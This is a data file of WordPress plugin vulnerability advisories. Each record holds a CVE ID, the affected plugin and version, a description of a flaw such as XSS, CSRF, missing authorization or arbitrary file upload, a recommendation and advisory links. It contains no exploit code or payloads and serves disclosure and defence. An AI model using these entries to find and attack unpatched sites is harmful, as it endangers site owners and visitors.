{"CVE_ID":"CVE-2024-4866","slug":"ultraaddons-elementor-lite","versionImpact":"1.1.6","description":"The UltraAddons \u2013 Elementor Addons (Header Footer Builder, Custom Font, Custom CSS,Woo Widget, Menu Builder, Anywhere Elementor Shortcode) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple widgets in all versions up to, and including, 1.1.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/544d7572-651f-45bb-b2ce-d768553c251a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/544d7572-651f-45bb-b2ce-d768553c251a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultraaddons-elementor-lite\\\/trunk\\\/inc\\\/widget\\\/hotspot.php#L341\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultraaddons-elementor-lite\\\/trunk\\\/inc\\\/widget\\\/hotspot.php#L341\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultraaddons-elementor-lite\\\/trunk\\\/inc\\\/widget\\\/hero-slider.php#L919\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultraaddons-elementor-lite\\\/trunk\\\/inc\\\/widget\\\/hero-slider.php#L919\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultraaddons-elementor-lite\\\/trunk\\\/inc\\\/widget\\\/work-hour.php#L529\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultraaddons-elementor-lite\\\/trunk\\\/inc\\\/widget\\\/work-hour.php#L529\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultraaddons-elementor-lite\\\/trunk\\\/inc\\\/widget\\\/advance-pricing-table.php#L1340\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultraaddons-elementor-lite\\\/trunk\\\/inc\\\/widget\\\/advance-pricing-table.php#L1340\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultraaddons-elementor-lite\\\/trunk\\\/inc\\\/widget\\\/video-popup.php#L592\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultraaddons-elementor-lite\\\/trunk\\\/inc\\\/widget\\\/video-popup.php#L592\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6545","slug":"admin-trim-interface","versionImpact":"3.5.1","description":"The Admin Trim Interface plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 3.5.1. This is due to the plugin utilizing bootstrap and leaving test files with display_errors on. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/92a50f24-7011-4fe4-a095-e7e320bfec81?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/92a50f24-7011-4fe4-a095-e7e320bfec81?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/admin-trim-interface\\\/trunk\\\/tests\\\/bootstrap.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/admin-trim-interface\\\/trunk\\\/tests\\\/bootstrap.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8046","slug":"logo-showcase-ultimate","versionImpact":"1.4.1","description":"The Logo Showcase Ultimate \u2013 Logo Carousel, Logo Slider & Logo Grid plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89525af0-105a-4d7d-93d1-af724a837e7a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89525af0-105a-4d7d-93d1-af724a837e7a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/logo-showcase-ultimate\\\/tags\\\/1.4.1\\\/lcg_adl_main.php#L236\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/logo-showcase-ultimate\\\/tags\\\/1.4.1\\\/lcg_adl_main.php#L236\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/logo-showcase-ultimate\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/logo-showcase-ultimate\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3141393\\\/#file3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3141393\\\/#file3\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3141393\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3141393\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9430","slug":"get-a-quote-for-woocommerce","versionImpact":"1.0.0","description":"The Get Quote For Woocommerce \u2013 Request A Quote For Woocommerce plugin for WordPress is vulnerable to unauthorized access of Quote data due to a missing capability check on the ct_tepfw_wp_loaded function in all versions up to, and including, 1.0.0. This makes it possible for unauthenticated attackers to download Quote PDF and CSV documents.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d0a0aa7-7bd9-4883-85b6-b7abf338aa75?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d0a0aa7-7bd9-4883-85b6-b7abf338aa75?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/get-a-quote-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/class-ct-rfq-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/get-a-quote-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/class-ct-rfq-admin.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9111","slug":"product-designer","versionImpact":"1.0.35","description":"The Product Designer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.35 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/product-designer\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/product-designer\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28126b4f-1cb6-4e91-b1c0-09f407d1dbf8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28126b4f-1cb6-4e91-b1c0-09f407d1dbf8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12494","slug":"bmlt-meeting-map","versionImpact":"2.6.1","description":"The BMLT Meeting Map plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'bmlt_meeting_map' shortcode in all versions up to, and including, 2.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bmlt-meeting-map\\\/tags\\\/2.6.0\\\/meeting_map.php#L33\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bmlt-meeting-map\\\/tags\\\/2.6.0\\\/meeting_map.php#L33\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bmlt-meeting-map\\\/tags\\\/2.6.0\\\/meeting_map.php#L462\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bmlt-meeting-map\\\/tags\\\/2.6.0\\\/meeting_map.php#L462\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73c01967-262c-48ab-a464-401b1cadd4be?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73c01967-262c-48ab-a464-401b1cadd4be?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0918","slug":"smtp-sendgrid","versionImpact":"1.3.1","description":"The SMTP for SendGrid \u2013 YaySMTP plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smtp-sendgrid\\\/trunk\\\/includes\\\/Functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smtp-sendgrid\\\/trunk\\\/includes\\\/Functions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3056461\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3056461\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234377\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234377\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smtp-sendgrid\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smtp-sendgrid\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b98f2a85-9535-4bf5-900c-f4f630c7b502?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b98f2a85-9535-4bf5-900c-f4f630c7b502?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13862","slug":"s3bubble-amazon-web-services-oembed-media-streaming-support","versionImpact":"8.0","description":"The S3Bubble Media Streaming (AWS|Elementor|YouTube|Vimeo Functionality) WordPress plugin through 8.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7692b768-a33f-45a2-90f1-1f4258493979\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7692b768-a33f-45a2-90f1-1f4258493979\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7692b768-a33f-45a2-90f1-1f4258493979\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7692b768-a33f-45a2-90f1-1f4258493979\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12282","slug":"wp-connect","versionImpact":"2.5.6","description":"The WordPress???? WordPress plugin through 2.5.6 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2d81f038-e2bb-4906-a954-78dc971ed793\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2d81f038-e2bb-4906-a954-78dc971ed793\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4666","slug":"zotpress","versionImpact":"7.3.15","description":"The Zotpress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018nickname\u2019 parameter in all versions up to, and including, 7.3.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zotpress\\\/trunk\\\/lib\\\/admin\\\/admin.accounts.php#L86\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zotpress\\\/trunk\\\/lib\\\/admin\\\/admin.accounts.php#L86\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zotpress\\\/trunk\\\/lib\\\/admin\\\/admin.functions.php#L66\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zotpress\\\/trunk\\\/lib\\\/admin\\\/admin.functions.php#L66\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zotpress\\\/trunk\\\/lib\\\/admin\\\/admin.options.form.php#L33\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zotpress\\\/trunk\\\/lib\\\/admin\\\/admin.options.form.php#L33\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zotpress\\\/trunk\\\/lib\\\/admin\\\/admin.options.form.php#L35\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zotpress\\\/trunk\\\/lib\\\/admin\\\/admin.options.form.php#L35\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1058078b-3afa-4fe7-913a-b6fc32252bf6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1058078b-3afa-4fe7-913a-b6fc32252bf6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7683","slug":"latestcheckins","versionImpact":"1","description":"The LatestCheckins plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1. This is due to missing or incorrect nonce validation on the 'LatestCheckins' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/latestcheckins\\\/trunk\\\/wzw-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/latestcheckins\\\/trunk\\\/wzw-admin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/latestcheckins\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/latestcheckins\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9b2b1500-04b6-40fb-8d1f-9c210f95788b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9b2b1500-04b6-40fb-8d1f-9c210f95788b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4347","slug":" woo-advanced-shipment-tracking","description":"The function update_shipment_status_email_status_fun in the plugin Advanced Shipment Tracking for WooCommerce in versions up to 3.2.6 is vulnerable to authenticated arbitrary options update. The function allows attackers (including those at customer level) to update any WordPress option in the database. Version 3.2.5 was initially released as a fix, but doesn't fully address the issue.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-advanced-shipment-tracking-for-woocommerce-fixed-critical-vulnerability\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-advanced-shipment-tracking-for-woocommerce-fixed-critical-vulnerability\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4174b47a-75d0-4ada-bd4d-efbaf0b1a049?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4174b47a-75d0-4ada-bd4d-efbaf0b1a049?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4390","slug":"contact-form-7-style","versionImpact":"3.2","description":"The Contact Form 7 Style plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.2. This is due to missing or incorrect nonce validation on the manage_wp_posts_be_qe_save_post() function. This makes it possible for unauthenticated attackers to quick edit templates via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-7-style\\\/trunk\\\/cf7-style-meta-box.php#L546\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-7-style\\\/trunk\\\/cf7-style-meta-box.php#L546\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2972cdaf-2d0a-4b55-b4f5-ccf01ff5352c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2972cdaf-2d0a-4b55-b4f5-ccf01ff5352c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4315","slug":"woo-custom-emails","versionImpact":"2.2","description":"The Woo Custom Emails for WordPress is vulnerable to Reflected Cross-Site Scripting via the wcemails_edit parameter in versions up to, and including, 2.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6782d8b3-32f9-42e1-874c-35a1e93ffde0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6782d8b3-32f9-42e1-874c-35a1e93ffde0?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-custom-emails\\\/trunk\\\/admin\\\/class-wcemails-admin.php#L335\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-custom-emails\\\/trunk\\\/admin\\\/class-wcemails-admin.php#L335\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3903","slug":"add-custom-css-and-js","versionImpact":"1.20","description":"The Add Custom CSS and JS WordPress plugin through 1.20 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in as author and above add Stored XSS payloads via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0a0e7bd4-948d-47c9-9219-380bda9f3034\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0a0e7bd4-948d-47c9-9219-380bda9f3034\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3937","slug":"playlist-for-youtube","versionImpact":"1.32","description":"The Playlist for Youtube WordPress plugin through 1.32 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0cd5b288-05b3-48b7-9245-f59ce7377861\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0cd5b288-05b3-48b7-9245-f59ce7377861\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6431","slug":"media-net-ads-manager","versionImpact":"2.10.13","description":"The Media.net Ads Manager plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation and missing capability check in the 'sendMail' function in all versions up to, and including, 2.10.13. This makes it possible for authenticated attackers, with subscriber-level and above permissions, to upload arbitrary files on the affected site's server which may make remote code execution possible. The vulnerability is only exploitable if anyone has ever logged in through the API.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/54fac673-2d83-4d06-a4c0-8bffc269a90c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/54fac673-2d83-4d06-a4c0-8bffc269a90c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-net-ads-manager\\\/tags\\\/2.10.13\\\/app\\\/admin\\\/MnetAdHandleAjaxCalls.php#L206\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-net-ads-manager\\\/tags\\\/2.10.13\\\/app\\\/admin\\\/MnetAdHandleAjaxCalls.php#L206\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7304","slug":"ninja-tables","versionImpact":"5.0.12","description":"The Ninja Tables \u2013 Easiest Data Table Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 5.0.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1eb6896-2de3-4d4d-9b5f-253aaffd193b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1eb6896-2de3-4d4d-9b5f-253aaffd193b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-tables\\\/tags\\\/5.0.12\\\/app\\\/Hooks\\\/filters.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-tables\\\/tags\\\/5.0.12\\\/app\\\/Hooks\\\/filters.php#L28\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ninja-tables\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ninja-tables\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3140370\\\/#file408\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3140370\\\/#file408\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3140370\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3140370\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8437","slug":"wp-easy-gallery","versionImpact":"4.8.5","description":"The WP Easy Gallery \u2013 WordPress Gallery Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several functions hooked via AJAX like wpeg_settings and wpeg_add_gallery in all versions up to, and including, 4.8.5. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify galleries.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8bd5021-4895-4b0e-b517-186959f76095?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8bd5021-4895-4b0e-b517-186959f76095?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-easy-gallery\\\/trunk\\\/wp-easy-gallery.php#L42\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-easy-gallery\\\/trunk\\\/wp-easy-gallery.php#L42\",\"refsource\":\"\",\"tags\":[]}]"}
